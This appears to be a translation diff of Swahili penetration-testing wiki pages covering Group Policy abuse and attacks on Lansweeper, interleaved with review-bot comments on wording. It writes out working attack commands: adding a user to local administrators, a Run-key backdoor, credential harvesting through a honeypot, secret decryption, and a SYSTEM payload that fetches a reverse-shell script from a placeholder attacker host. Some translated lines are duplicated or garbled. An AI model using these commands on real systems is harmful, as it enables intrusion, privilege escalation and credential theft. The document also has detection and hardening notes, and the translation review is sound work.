GPO zilizopangwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda immediate scheduled task. Hii inaweza kutumika kuongeza mtumiaji kwenye local administrators group kwenye mashine zilizoathirika, hivyo kuinua vibali kwa kiasi kikubwa:
GPOs zilizo sanidiwa vibaya zinaweza kutumiwa kuendesha code, kwa mfano, kwa kuunda kazi ya ratiba inayotekelezwa mara moja. Hii inaweza kutumika kuongeza mtumiaji kwenye kikundi cha local administrators kwenye mashine zilizoathiriwa, na hivyo kuongeza kwa kiasi kikubwa viwango vya ruhusa:
```bash
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
```
### GroupPolicy module - Abuse GPO

Module ya GroupPolicy, ikiwa imewekwa, inaruhusu kuunda na kuunganisha GPOs mpya, na kuweka mapendeleo, kama vile registry values, ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Njia hii inahitaji GPO kusasishwa na mtumiaji aingie kwenye kompyuta kwa ajili ya utekelezaji:
The GroupPolicy module, ikiwa imewekwa, inaruhusu uundaji na kuunganisha GPOs mpya, pamoja na kuweka mapendeleo kama registry values ili kutekeleza backdoors kwenye kompyuta zilizoathiriwa. Mbinu hii inahitaji GPO kusasishwa na mtumiaji kuingia kwenye kompyuta ili utekelezaji ufanyike:
```bash
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
```
### SharpGPOAbuse - Abuse GPO

SharpGPOAbuse inatoa mbinu ya kutumia vibaya GPO zilizopo kwa kuongeza kazi au kubadilisha mipangilio bila hitaji la kuunda GPO mpya. Zana hii inahitaji marekebisho ya GPO zilizopo au kutumia zana za RSAT kuunda mpya kabla ya kutekeleza mabadiliko:
SharpGPOAbuse inatoa njia ya abuse GPOs zilizopo kwa kuongeza tasks au kubadilisha settings bila hitaji la kuunda GPOs mpya. Zana hii inahitaji uhariri wa GPOs zilizopo au kutumia RSAT tools kuunda GPOs mpya kabla ya kutekeleza mabadiliko:
```bash
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
```
### Lazimisha Sasisho la Sera
### Leteza Sasisho la Sera

Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, amri `gpupdate /force` inaweza kutumika kwenye kompyuta lengwa ili kulazimisha sasisho la sera mara moja. Amri hii inahakikisha kwamba mabadiliko yoyote kwa GPOs yanatekelezwa bila kusubiri mzunguko ujao wa sasisho la kiotomatiki.
Sasisho za GPO kwa kawaida hufanyika takriban kila dakika 90. Ili kuharakisha mchakato huu, hasa baada ya kutekeleza mabadiliko, agizo `gpupdate /force` linaweza kutumika kwenye kompyuta ya lengo ili kulazimisha sasisho la sera mara moja. Agizo hili linahakikisha kuwa marekebisho yoyote ya GPOs yatekelezwa bila kusubiri mzunguko wa sasisho la kiotomatiki.

### Ndani ya Mfumo

Baada ya kuchunguza Majukumu yaliyopangwa kwa GPO fulani, kama `Misconfigured Policy`, inaweza kuthibitishwa kwamba majukumu kama `evilTask` yameongezwa. Majukumu haya huundwa kupitia scripti au zana za command-line zinazolenga kubadilisha tabia ya mfumo au kuinua ruhusa.
Ukikagua Scheduled Tasks za GPO fulani, kama `Misconfigured Policy`, unaweza kuthibitisha kuongezwa kwa kazi kama `evilTask`. Kazi hizi zimeundwa kupitia scripts au zana za command-line zinazolenga kubadilisha tabia za mfumo au kuongeza uwezo wa kusimamisha haki.

Muundo wa kazi, kama inavyoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaeleza maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri iliyotakiwa kutekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi Majukumu yaliyopangwa yanavyofafanuliwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripti yoyote kama sehemu ya utekelezaji wa sera.
Muundo wa kazi, kama vile unaoonyeshwa katika faili ya usanidi ya XML iliyotengenezwa na `New-GPOImmediateTask`, unaelezea maelezo maalum ya kazi iliyopangwa - ikiwa ni pamoja na amri itakayotekelezwa na vichocheo vyake. Faili hii inaonyesha jinsi kazi zilizopangwa zinasainiwa na kusimamiwa ndani ya GPOs, ikitoa njia ya kutekeleza amri au scripts yoyote kama sehemu ya utekelezaji wa sera.

### Watumiaji na Vikundi

GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo lengwa. Kwa kuhariri faili za sera za Users and Groups moja kwa moja, washambuliaji wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama kikundi cha eneo cha `administrators`. Hii inatokea kupitia ugawaji (delegation) wa ruhusa za usimamizi wa GPO, ambao unaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.
GPOs pia huruhusu udhibiti wa uanachama wa watumiaji na vikundi kwenye mifumo ya lengo. Kwa kuhariri faili za sera za Watumiaji na Vikundi moja kwa moja, wadukuzi wanaweza kuongeza watumiaji kwenye vikundi vyenye mamlaka, kama vile kundi la ndani la `administrators`. Hii inawezekana kupitia uteuzi wa ruhusa za usimamizi wa GPO, ambayo inaruhusu mabadiliko ya faili za sera ili kujumuisha watumiaji wapya au kubadilisha uanachama wa vikundi.

Faili ya usanidi ya XML kwa Users and Groups inaeleza jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa ruhusa zilizoongezwa kwenye mifumo iliyoharibika. Njia hii inatoa njia ya moja kwa moja ya kuinua viwango vya ruhusa kupitia udanganyifu wa GPO.
Faili ya usanidi ya XML kwa Watumiaji na Vikundi inaelezea jinsi mabadiliko haya yanavyotekelezwa. Kwa kuongeza rekodi kwenye faili hii, watumiaji maalum wanaweza kupewa haki zilizoinuliwa kwa mifumo yote iliyohusishwa. Njia hii inatoa njia ya moja kwa moja ya kuinua hadhi kupitia uhariri wa GPO.

Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha upatikanaji, kama kutumia scripti za kuingia/kuondoka (logon/logoff), kubadilisha vitufe vya registry kwa ajili ya autoruns, kusakinisha programu kupitia faili za .msi, au kuhariri usanidi wa services, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo lengwa kupitia matumizi mabaya ya GPOs.
Zaidi ya hayo, mbinu nyingine za kutekeleza msimbo au kudumisha udumishaji, kama vile kutumia logon/logoff scripts, kurekebisha registry keys kwa ajili ya autoruns, kusakinisha software kupitia .msi files, au kuhariri service configurations, pia zinaweza kuzingatiwa. Mbinu hizi zinatoa njia mbalimbali za kudumisha upatikanaji na kudhibiti mifumo ya lengo kupitia unyonyaji wa GPOs.

## Marejeo


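Review bot: "### Leteza Sasisho la Sera" is a regression: "leteza" is not a Swahili word, and the previous "### Lazimisha Sasisho la Sera" correctly rendered "Force Policy Update"; restore it. Two further points in this hunk: the new DCSync heading "Kurudishana kwenye Domain" means "returning to each other", not replication, so "Usawazishaji kwenye Domain (DCSync)" (matching the paragraph's own "kusawazisha") or simply "Replication kwenye Domain (DCSync)" fits better; and the inline commands in the GPO delegation and enumeration paragraphs still carry the fence language tag inside the backticks (`bash Get-ObjectAcl ...`, `powershell Get-NetGPO ...`, `powershell Get-NetOU ...`). That artifact is present in both old and new lines, so strip the leading "bash "/"powershell " or turn them back into fenced blocks as in the English source.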
@ -1,28 +1,28 @@
# Lansweeper Matumizi Mabaya: Credential Harvesting, Secrets Decryption, and Deployment RCE
# Matumizi mabaya ya Lansweeper: Credential Harvesting, Secrets Decryption, and Deployment RCE

{{#include ../../banners/hacktricks-training.md}}

Lansweeper ni jukwaa la ugundaji na inventory la IT linalotumika kwa kawaida kwenye Windows na limeunganishwa na Active Directory. Credentials zilizowekwa katika Lansweeper zimetumika na scanning engines zake kuthibitisha kwenye assets kupitia protocols kama SSH, SMB/WMI na WinRM. Misconfigurations mara nyingi huruhusu:
Lansweeper ni jukwaa la kugundua na kuhifadhi kumbukumbu za mali za IT ambalo mara nyingi huwekwa kwenye Windows na kuunganishwa na Active Directory. Credentials zilizosanifiwa ndani ya Lansweeper zinatumiwa na scanning engines zake kuthibitisha kwenye assets kupitia itifaki kama SSH, SMB/WMI na WinRM. Mipangilio mibaya mara nyingi inawezesha:

- Kukamata Credential kwa kuelekeza Scanning Target kwenye mwenyeji unaodhibitiwa na mshambuliaji (honeypot)
- Matumizi mabaya ya AD ACLs zilizofunguliwa na vikundi vinavyohusiana na Lansweeper ili kupata ufikiaji wa mbali
- Credential interception kwa kupeleka tena scanning target kwa host inayodhibitiwa na mshambuliaji (honeypot)
- Abuse of AD ACLs zinazofichuliwa na vikundi vinavyohusiana na Lansweeper ili kupata ufikiaji wa mbali
- On-host decryption ya Lansweeper-configured secrets (connection strings and stored scanning credentials)
- Code execution kwenye managed endpoints kupitia kipengele cha Deployment (mara nyingi running as SYSTEM)
- Code execution kwenye managed endpoints kupitia kipengele cha Deployment (mara nyingi kinaendesha kama SYSTEM)

Ukurasa huu unatoa muhtasari wa workflows za mshambuliaji na amri za kutumia tabia hizi wakati wa engagements.
Ukurasa huu unatoa muhtasari wa workflows za mshambuliaji na amri za vitendo za kutumia tabia hizi wakati wa engagements.

## 1) Harvest scanning credentials via honeypot (SSH example)

Idea: unda Scanning Target inayorejea kwenye host yako na uifunganye na Scanning Credentials zilizopo. Wakati scan inapoendeshwa, Lansweeper itajaribu kuthibitisha kwa kutumia credentials hizo, na honeypot yako itazikamata.
Wazo: unda Scanning Target inayowelekeza kwa host yako na uoanishe Scanning Credentials zilizopo nayo. Wakati scan itakapokimbia, Lansweeper itajaribu kuthibitisha kwa kutumia hizo credentials, na honeypot yako itaziwakamata.

Steps overview (web UI):
Muhtasari wa hatua (web UI):
- Scanning → Scanning Targets → Add Scanning Target
- Type: IP Range (or Single IP) = your VPN IP
- Configure SSH port to something reachable (e.g., 2022 if 22 is blocked)
- Disable schedule and plan to trigger manually
- Scanning → Scanning Credentials → ensure Linux/SSH creds exist; map them to the new target (enable all as needed)
- Click “Scan now” on the target
- Run an SSH honeypot and retrieve the attempted username/password
- Type: IP Range (or Single IP) = anwani yako ya VPN
- Sanidi port ya SSH kuwa nambari inayoweza kufikiwa (mf., 2022 ikiwa 22 imezuiwa)
- Zima ratiba na panga kuitisha kwa mkono
- Scanning → Scanning Credentials → hakikisha Linux/SSH creds zipo; ramana hizo kwa target mpya (wezeshwa zote inapohitajika)
- Bonyeza “Scan now” kwenye target
- Endesha SSH honeypot na pokea jina la mtumiaji/nenosiri lililotumika kujaribu kuingia

Example with sshesame:
```yaml
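Review bot: Several new lines in the steps list contain typos or non-words: "ramana hizo kwa target mpya" should be "ziunganishe na target mpya" (map them to the new target), "wezeshwa zote" should be the imperative "wezesha zote", and in the "Wazo:" paragraph "itaziwakamata" should be "itazikamata" while "itakapokimbia" (kimbia is run as in flee) should be "itakapoendeshwa". The bullet list at the top is also only half translated: "- Abuse of AD ACLs zinazofichuliwa..." puts an English head on a Swahili clause where the old "- Matumizi mabaya ya AD ACLs zilizofunguliwa..." was complete, and "- On-host decryption ya Lansweeper-configured secrets..." is untouched; finish those two or leave the whole list in English, but not a mix.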
@ -47,14 +47,14 @@ netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
netexec winrm inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
```
Vidokezo
- Inafanya kazi kwa njia sawa kwa itifaki nyingine wakati unaweza kulazimisha scanner kuunganishwa na listener yako (SMB/WinRM honeypots, n.k.). SSH mara nyingi ni rahisi zaidi.
- Scanners wengi hujitambulisha kwa client banners za kipekee (mf., RebexSSH) na zitajaribu amri zisizo hatari (uname, whoami, n.k.).
- Inafanya kazi kwa njia sawa kwa protocols nyingine wakati unaweza ku-coerce the scanner kwa listener wako (SMB/WinRM honeypots, etc.). SSH mara nyingi ni rahisi zaidi.
- Scanners wengi hujitambulisha kwa distinct client banners (e.g., RebexSSH) na watajaribu benign commands (uname, whoami, etc.).

## 2) AD ACL abuse: pata ufikia wa mbali kwa kujiongeza mwenyewe kwenye app-admin group
## 2) AD ACL abuse: pata ufikiaji wa mbali kwa kujiongeza kwenye app-admin group

Tumia BloodHound kuorodhesha effective rights kutoka kwa akaunti iliyovamiwa. Matokeo ya kawaida ni kikundi maalum cha scanner au app (mf., “Lansweeper Discovery”) kinachoshikilia GenericAll juu ya kikundi lenye mamlaka (mf., “Lansweeper Admins”). Ikiwa kikundi lenye mamlaka pia ni mjumbe wa “Remote Management Users”, WinRM inapatikana mara tu tunapojiongeza.
Tumia BloodHound kuorodhesha haki za ufanisi (effective rights) kutoka kwa akaunti iliyoharibiwa. Ugunduzi wa kawaida ni scanner- au app-specific group (e.g., “Lansweeper Discovery”) inayoshikilia GenericAll juu ya group iliyo na hadhi (e.g., “Lansweeper Admins”). Ikiwa group iliyo na hadhi pia ni mwanachama wa “Remote Management Users”, WinRM inapatikana mara tu tunapojiongeza.

Collection examples:
Mifano ya collection:
```bash
# NetExec collection with LDAP
netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhound -c All --dns-server <DC_IP>
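Review bot: The two rewritten notes under "Vidokezo" are less translated than the lines they replace: "ku-coerce the scanner kwa listener wako", "distinct client banners" and "benign commands" supersede Swahili that was already correct ("kulazimisha scanner kuunganishwa na listener yako", "client banners za kipekee", "amri zisizo hatari"); keep the old wording. In the BloodHound paragraph, "akaunti iliyoharibiwa" reads as "damaged account"; the old "akaunti iliyovamiwa" is the right rendering of "compromised account", and "haki za ufanisi (effective rights)" is a literal gloss where the old line kept "effective rights" as a term.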
@ -62,7 +62,7 @@ netexec ldap inventory.sweep.vl -u svc_inventory_lnx -p '<password>' --bloodhoun
# RustHound-CE collection (zip for BH CE import)
rusthound-ce --domain sweep.vl -u svc_inventory_lnx -p '<password>' -c All --zip
```
Exploit GenericAll kwenye kundi kwa kutumia BloodyAD (Linux):
Exploit GenericAll kwenye kundi na BloodyAD (Linux):
```bash
# Add our user into the target group
bloodyAD --host inventory.sweep.vl -d sweep.vl -u svc_inventory_lnx -p '<password>' \
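Review bot: "Exploit GenericAll kwenye kundi na BloodyAD (Linux):" uses "kundi" while the rest of this file uses "kikundi" or "group" for the same noun (see the BloodHound paragraph just above); settle on one form. "na BloodyAD" for "with BloodyAD" is acceptable, but the old "kwa kutumia BloodyAD" is the clearer instrumental phrasing and did not need changing.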
@ -75,20 +75,20 @@ Kisha pata interactive shell:
```bash
evil-winrm -i inventory.sweep.vl -u svc_inventory_lnx -p '<password>'
```
Kidokezo: Operesheni za Kerberos zinategemea muda. Ikiwa unapokea KRB_AP_ERR_SKEW, linganisha saa na DC kwanza:
Kidokezo: Operesheni za Kerberos zinategemea muda. Ikiwa unapata KRB_AP_ERR_SKEW, linganisha saa na DC kwanza:
```bash
sudo ntpdate <dc-fqdn-or-ip> # or rdate -n <dc-ip>
```
## 3) Fungua siri zilizowekwa na Lansweeper kwenye mwenyeji
## 3) Decrypt Lansweeper-configured secrets on the host

Kwenye server ya Lansweeper, tovuti ya ASP.NET kawaida huhifadhi encrypted connection string na symmetric key inayotumika na application. Kwa upatikanaji wa ndani unaofaa, unaweza dekripti connection string ya DB kisha kutoa credentials zilizohifadhiwa za scanning.
Kwenye seva ya Lansweeper, tovuti ya ASP.NET kwa kawaida huhifadhi encrypted connection string na symmetric key zinazotumiwa na application. Ukiwa na access ya ndani inayofaa, unaweza decrypt DB connection string kisha kutoa stored scanning credentials.

Typical locations:
- Web config: `C:\Program Files (x86)\Lansweeper\Website\web.config`
- `<connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">` … `<EncryptedData>…`
- Application key: `C:\Program Files (x86)\Lansweeper\Key\Encryption.txt`

Tumia SharpLansweeperDecrypt kuendesha decryption na kutupa credentials zilizohifadhiwa:
Use SharpLansweeperDecrypt to automate decryption and dumping of stored creds:
```powershell
# From a WinRM session or interactive shell on the Lansweeper host
# PowerShell variant
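Review bot: Two lines in this hunk revert Swahili to English: the section heading "## 3) Fungua siri zilizowekwa na Lansweeper kwenye mwenyeji" becomes "## 3) Decrypt Lansweeper-configured secrets on the host", and "Tumia SharpLansweeperDecrypt kuendesha decryption..." becomes "Use SharpLansweeperDecrypt to automate...". If the intent is to keep section titles in English, the sibling heading "## 2) AD ACL abuse: pata ufikiaji wa mbali..." should follow the same rule; otherwise restore the Swahili. The "Typical locations:" label above the two file paths is unchanged and still untranslated, so it should be handled the same way.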
@ -99,26 +99,26 @@ powershell -ExecutionPolicy Bypass -File C:\ProgramData\LansweeperDecrypt.ps1
# - Connect to Lansweeper DB
# - Decrypt stored scanning credentials and print them in cleartext
```
Matokeo yanayotarajiwa yanajumuisha DB connection details na plaintext scanning credentials kama vile Windows na Linux accounts zinazotumika katika estate. Hizi mara nyingi zina elevated local rights kwenye domain hosts:
Matokeo yanayotarajiwa yanajumuisha DB connection details na plaintext scanning credentials kama vile akaunti za Windows na Linux zinazotumika katika estate nzima. Hizi mara nyingi zina elevated local rights kwenye domain hosts:
```text
Inventory Windows SWEEP\svc_inventory_win <StrongPassword!>
Inventory Linux svc_inventory_lnx <StrongPassword!>
```
Tumia recovered Windows scanning creds kwa ufikiaji wa ruhusa za juu:
Tumia Windows scanning creds zilizopatikana kwa upatikanaji wa ruhusa za juu:
```bash
netexec winrm inventory.sweep.vl -u svc_inventory_win -p '<StrongPassword!>'
# Typically local admin on the Lansweeper-managed host; often Administrators on DCs/servers
```
## 4) Lansweeper Deployment → SYSTEM RCE

Kama mwanachama wa “Lansweeper Admins”, UI ya wavuti inaonyesha Deployment na Configuration. Chini ya Deployment → Deployment packages, unaweza kuunda packages ambazo zinaendesha amri yoyote kwenye vifaa vilivyolengwa. Utekelezaji hufanywa na service ya Lansweeper kwa ruhusa za juu, ukileta code execution kama NT AUTHORITY\SYSTEM kwenye host iliyochaguliwa.
Kama mwanachama wa “Lansweeper Admins”, UI ya wavuti inaonyesha Deployment na Configuration. Chini ya Deployment → Deployment packages, unaweza kuunda packages ambazo zinaendesha amri za aina yoyote kwenye assets zilizolengwa. Utekelezaji unafanywa na huduma ya Lansweeper kwa vibali vya juu, ukitoa utekelezaji wa msimbo kama NT AUTHORITY\SYSTEM kwenye host iliyochaguliwa.

High-level steps:
Hatua za juu:
- Tengeneza package mpya ya Deployment inayotekeleza PowerShell au cmd one-liner (reverse shell, add-user, n.k.).
- Lenga kifaa kinachotakiwa (mf., DC/host ambapo Lansweeper inaendesha) kisha bonyeza Deploy/Run now.
- Lenga asset unayotaka (kwa mfano, DC/host ambapo Lansweeper inakimbia) na bonyeza Deploy/Run now.
- Pata shell yako kama SYSTEM.

Example payloads (PowerShell):
Mifano ya payloads (PowerShell):
```powershell
# Simple test
powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt"
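Review bot: "Hatua za juu:" is a literal rendering of "High-level steps" that reads as "upper steps"; "Hatua kuu:" or "Muhtasari wa hatua:" (already used for "Steps overview" in the honeypot section of this commit) is the natural choice. In the target bullet, "ambapo Lansweeper inakimbia" again uses "kimbia" for "runs"; the old "inaendesha" (or "inapoendeshwa") should be kept.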
@ -127,21 +127,21 @@ powershell -nop -w hidden -c "whoami > C:\Windows\Temp\ls_whoami.txt"
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://<attacker>/rs.ps1')"
```
OPSEC
- Vitendo vya deployment huwa vinasikika na kuacha logs ndani ya Lansweeper na Windows event logs. Tumia kwa tahadhari.
- Vitendo vya Deployment husababisha kelele na huacha logs katika Lansweeper na Windows event logs. Tumia kwa uangalifu.

## Ugunduzi na kuimarisha usalama
## Utambuzi na kuimarisha

- Zuia au ondoa anonymous SMB enumerations. Simamia RID cycling na ufikiaji usio wa kawaida wa Lansweeper shares.
- Egress controls: zuia au punguza sana outbound SSH/SMB/WinRM kutoka scanner hosts. Taarifu kwa ports zisizo za kawaida (mf., 2022) na client banners zisizo za kawaida kama Rebex.
- Linda `Website\\web.config` na `Key\\Encryption.txt`. Hamisha siri (externalize) ndani ya vault na zungusha (rotate) pale zinapofichuliwa. Fikiria service accounts zenye ruhusa ndogo na gMSA pale inapowezekana.
- AD monitoring: toa tahadhari kuhusu mabadiliko kwa makundi yanayohusiana na Lansweeper (mf., “Lansweeper Admins”, “Remote Management Users”) na kwa mabadiliko ya ACL yanayotoa GenericAll/Write uanachama kwa makundi yenye ruhusa za juu.
- Fanya ukaguzi wa utengenezaji/mabadiliko/utekelezaji wa Deployment packages; toa tahadhari kwa packages zinazozindua cmd.exe/powershell.exe au kuanzisha muunganisho wa outbound usiotarajiwa.
- Zuia au ondoa uorodheshaji wa SMB wa anonymous. Fuatilia RID cycling na upatikanaji usio wa kawaida wa Lansweeper shares.
- Egress controls: zuia au punguza kwa ukali outbound SSH/SMB/WinRM kutoka scanner hosts. Toa onyo kwa ports zisizo za kawaida (e.g., 2022) na client banners zisizo za kawaida kama Rebex.
- Linda `Website\\web.config` na `Key\\Encryption.txt`. Hamisha siri kwenye vault na uzibadilishe (rotate) pale zitakapofichuka. Fikiria service accounts zenye privileges za chini na gMSA pale inapofaa.
- AD monitoring: toa onyo kwa mabadiliko ya vikundi vinavyohusiana na Lansweeper (e.g., “Lansweeper Admins”, “Remote Management Users”) na kwa mabadiliko ya ACL yanayotoa GenericAll/Write membership kwa vikundi vilivyo na haki za juu.
- Audit Deployment package creations/changes/executions; toa onyo kwa packages zinazowasha cmd.exe/powershell.exe au muunganisho wa outbound usiotarajiwa.

## Mada zinazohusiana
- SMB/LSA/SAMR enumeration na RID cycling
- Kerberos password spraying na mambo ya kuzingatia kuhusu clock skew
- BloodHound path analysis ya application-admin groups
- WinRM usage na lateral movement
- SMB/LSA/SAMR enumeration and RID cycling
- Kerberos password spraying and clock skew considerations
- BloodHound path analysis of application-admin groups
- WinRM usage and lateral movement

## References
- [HTB: Sweep — Abusing Lansweeper Scanning, AD ACLs, and Secrets to Own a DC (0xdf)](https://0xdf.gitlab.io/2025/08/14/htb-sweep.html)

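Review bot: The "## Mada zinazohusiana" list is replaced by its English version ("- SMB/LSA/SAMR enumeration and RID cycling", etc.), undoing the earlier translation, and "## References" stays in English while the other file in this commit uses "## Marejeo"; restore the Swahili items and align the heading. The last new detection bullet, "- Audit Deployment package creations/changes/executions; toa onyo...", also starts in English where the old "- Fanya ukaguzi wa utengenezaji/mabadiliko/utekelezaji wa Deployment packages..." was already translated; keep the old opening. The remaining hardening bullets read well and are the right place for this advice.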